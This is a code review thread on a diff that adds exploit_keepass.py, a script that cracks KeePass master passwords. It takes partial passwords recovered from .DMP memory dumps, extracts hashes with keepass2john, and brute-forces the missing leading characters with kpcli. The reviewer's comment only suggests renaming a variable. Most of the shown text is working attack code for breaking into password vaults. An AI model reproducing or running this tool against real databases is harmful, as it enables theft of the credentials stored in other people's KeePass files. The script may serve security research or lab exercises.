exploit_keepass.py

```diff
@@ -0,0 +1,311 @@
+
+    # wordlist, that contains all possible first characters
+    wordlist = "wordlist.txt"
+
+    # iterating over all .kdbx files and their associated master passwords without the first two characters
+    for kdbx_file, masterpassword_without_first in masterpasswords_without_first.items():
+        kdbx_hash = kdbx_hashes.get(kdbx_file)
+        
+        if not kdbx_hash:
+            print(f"No hash found for {kdbx_file}. Skipping...")
+            continue
+
+        with open(wordlist, 'r') as wl:
+            for first_char in wl:
+                first_char = first_char.strip()
+                # reconstructing the full password using the current first two characters
+                possible_password = first_char + masterpassword_without_first
+
+                # performing the Brute-Force Attack with kpcli
+                result = subprocess.run(
+                    ['kpcli', '--kdb=' + kdbx_file, '--pw=' + possible_password],
+                    capture_output=True, text=True
+                )
+
+                if result.returncode == 0:
+                    # saving password in dictionary if it is correct
+                    cracked_passwords[kdbx_file] = possible_password
+                    # print(f"Password found for {kdbx_file}: {possible_password}") # printing password for Hash
+                    break  # ending loop for this file if password is found
+            
+    return cracked_passwords
+
+
+def main() -> None:
+    """
+    Main function to orchestrate the cracking of KeePass master passwords using .kdbx and .DMP files.
+
+    Steps:
+        1. Extracts .kdbx and .DMP files from the specified directory.
+        2. Maps .DMP files to corresponding .kdbx files.
+        3. Extracts partial master passwords (missing first two characters) from .DMP files using a customized script of keepass-dump-masterkey.
+        4. Extracts hashes from .kdbx files using the `keepass2john` tool.
+        5. Links partial master passwords with .kdbx files based on their mapping.
+        6. Performs a Brute-Force Attack using a wordlist to reconstruct the full master passwords with `kpcli`.
+        7. Saves the results (cracked passwords) in a .potfile.
+        8. Prints the final result.
+
+    Args:
+        None (arguments are parsed directly from the command line).
+
+    Returns:
+        None (results are saved to a file and printed to the console).
+    """
+    parser = argparse.ArgumentParser(description="Crack KeePass Master Passwords using .kdbx and .DMP files.")
+    parser.add_argument('-dir', required=True, help="Directory containing .kdbx and .DMP file pairs")
+    args = parser.parse_args()
+
+    # path to directory that includes .kdbx and .DMP files
+    directory = args.dir
+
+    # 1) extracting .kdbx and DMP files
+    kdbx_files, dmp_files = process_directory(directory)
+
+    # 2) mapping .DMP files to corresponding .kdbx files
+    dmp_to_kdbx = map_dmp_to_kdbx(kdbx_files, dmp_files)
```

Comment:
suggesting a map suffix to clarify that this is a mapping stored in the variable. Other than that my interpretation of `dmp_to_kdbx` could/would be a conversion result.

```suggestion
    dmp_to_kdbx_map = map_dmp_to_kdbx(kdbx_files, dmp_files)
```